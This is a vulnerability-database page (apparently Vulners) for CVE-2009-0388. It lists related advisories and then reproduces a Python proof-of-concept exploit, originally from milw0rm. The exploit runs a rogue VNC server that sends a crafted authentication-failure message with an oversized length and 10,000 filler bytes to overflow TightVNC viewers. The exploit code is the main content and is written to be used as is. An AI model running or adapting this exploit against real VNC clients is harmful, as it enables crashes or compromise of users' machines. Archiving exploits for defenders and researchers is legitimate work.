| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
| TightVNC Authentication Failure Integer Overflow PoC | 9 Feb 200900:00 | – | zdt | |
| CVE-2009-0388 | 4 Feb 200900:00 | – | circl | |
| VNC Multiple Integer Overflows | 3 Feb 200900:00 | – | coresecurity | |
| Update Protection against UltraVNC VNCViewer Authenticate Buffer Overflow | 27 Feb 200900:00 | – | checkpoint_advisories | |
| UltraVNC VNCViewer Authenticate Buffer Overflow (CVE-2009-0388) | 11 Oct 200900:00 | – | checkpoint_advisories | |
| CVE-2009-0388 | 4 Feb 200919:00 | – | cve | |
| CVE-2009-0388 | 4 Feb 200919:00 | – | cvelist | |
| CVE-2009-0388 | 4 Feb 200919:00 | – | debiancve | |
| TightVNC - Authentication Failure Integer Overflow (PoC) | 9 Feb 200900:00 | – | exploitpack | |
| KLA11371 ACE vulnerability in TightVNC | 4 Feb 200900:00 | – | kaspersky |
#!/usr/bin/env python
#[email protected]
# Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x02\x02\x10'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = '\x00'*4
clientsocket.sendall(data)
data = ('\x00'*3)+'\x01'
clientsocket.sendall(data)
data = ('\x00'*3)+'\x02STDVVNCAUTH_'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = ('\x01'*16)
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = '\x00\x00\x00\x01'
clientsocket.sendall(data)
data = '\xf0\xff\xff\xff'
clientsocket.sendall(data)
data = 'A'*10000
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# milw0rm.com [2009-02-09]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation